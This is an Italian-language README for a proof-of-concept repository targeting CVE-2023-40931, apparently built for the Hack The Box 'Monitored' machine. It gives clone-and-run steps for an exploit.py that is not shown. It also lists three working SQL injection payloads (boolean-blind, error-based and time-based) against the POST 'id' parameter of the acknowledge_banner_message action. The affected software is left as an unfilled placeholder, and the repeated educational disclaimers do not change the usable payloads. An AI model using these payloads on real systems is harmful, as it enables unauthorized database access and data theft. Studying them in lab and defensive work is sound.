
Prova di concetto per CVE-2023-40931 realizzata per HTB MONITORED
Questo repository contiene una Prova di concetto (PoC) per CVE-2023-40931, una vulnerabilità di sicurezza identificata in [software/sistema interessato]. Lo scopo di questo repository è dimostrare la vulnerabilità solo a fini educativi e di ricerca. 🛠️
Questo progetto è destinato esclusivamente a scopi educativi e test autorizzati. L'uso improprio di questo codice può comportare conseguenze legali. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo codice. Ottenere sempre la debita autorizzazione prima di testare qualsiasi sistema. 🔒
Per maggiori informazioni, fare riferimento alla voce CVE ufficiale: CVE-2023-40931. 🔗
Clonare il repository:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
Il parametro POST 'id' è vulnerabile. I seguenti payload hanno sfruttato con successo la vulnerabilità:
Boolean-based blind: Questo payload utilizza un'istruzione condizionale per determinare il valore di verità di una query, consentendo l'estrazione di dati tramite logica booleana.
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))Error-based: Questo payload sfrutta i messaggi di errore del database per estrarre informazioni attivando errori specifici.
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Time-based blind: Questo payload utilizza ritardi temporali per dedurre informazioni osservando il tempo di risposta del server.
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)Questi payload dimostrano la suscettibilità della vulnerabilità agli attacchi SQL injection. Procedere con cautela e assicurarsi di avere la debita autorizzazione prima di testare. 🔒
Seguire le istruzioni nel file exploit.py per eseguire la PoC. 🧑💻
Nota: Assicurarsi di avere installate le dipendenze richieste. ✅